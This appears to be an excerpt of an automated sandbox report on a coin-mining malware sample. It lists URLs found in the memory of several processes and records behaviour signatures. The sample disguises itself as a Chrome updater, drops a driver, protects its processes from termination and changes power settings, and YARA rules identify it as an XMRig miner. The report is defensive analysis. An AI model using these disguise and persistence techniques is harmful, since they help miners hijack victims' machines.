      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
      Source: lsass.exe, 00000016.00000002.5693861980.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435955395.00000207AA10A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
      Source: lsass.exe, 00000016.00000000.4436179349.00000207AA14C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4486695225.00000207AA023000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435021469.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5670096986.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693012290.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA14D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433108426.00000207A9660000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4611401089.00000207A9E3C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
      Source: powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000010.00000002.4450454787.000002790E683000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000010.00000002.4472008728.00000279289F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
      Source: lsass.exe, 00000016.00000002.5693861980.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435955395.00000207AA10A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
      Source: lsass.exe, 00000016.00000000.4436179349.00000207AA14C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4486695225.00000207AA023000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435021469.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5670096986.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693012290.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA14D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433108426.00000207A9660000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4611401089.00000207A9E3C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
      Source: lsass.exe, 00000016.00000002.5671170821.00000207A96A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5683001175.00000207A9E16000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
      Source: powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocert.com
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4436179349.00000207AA14C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4486695225.00000207AA023000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435021469.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5670096986.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693012290.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435955395.00000207AA10A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
      Source: lsass.exe, 00000016.00000000.4436179349.00000207AA156000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA156000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsof
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustock
      Source: powershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/am
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: powershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
      Source: powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0

      Operating System Destruction

      barindex
      Protects its processes via BreakOnTermination flag
      Source: C:\Program Files\Google\Chrome\updater.exeProcess information set: 01 00 00 00
      Source: C:\Program Files\Google\Chrome\updater.exeProcess information set: 01 00 00 00

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Uses powercfg.exe to modify the power settings
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 6%
      Source: C:\Windows\System32\dialer.exeProcess Stats: CPU usage > 6%
      Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
      Source: C:\Program Files\Google\Chrome\updater.exeFile deleted: C:\Windows\Temp\kkldhmzqxige.tmp
      Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
      Source: kkldhmzqxige.tmp.0.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Source: updater.exe.0.drStatic PE information: Number of sections : 11 > 10
      Source: test2.exeStatic PE information: Number of sections : 11 > 10
      Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@67/65@19/0
      Source: C:\Users\user\Desktop\test2.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8080:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8080:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5152:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6500:304:WilStaging_02
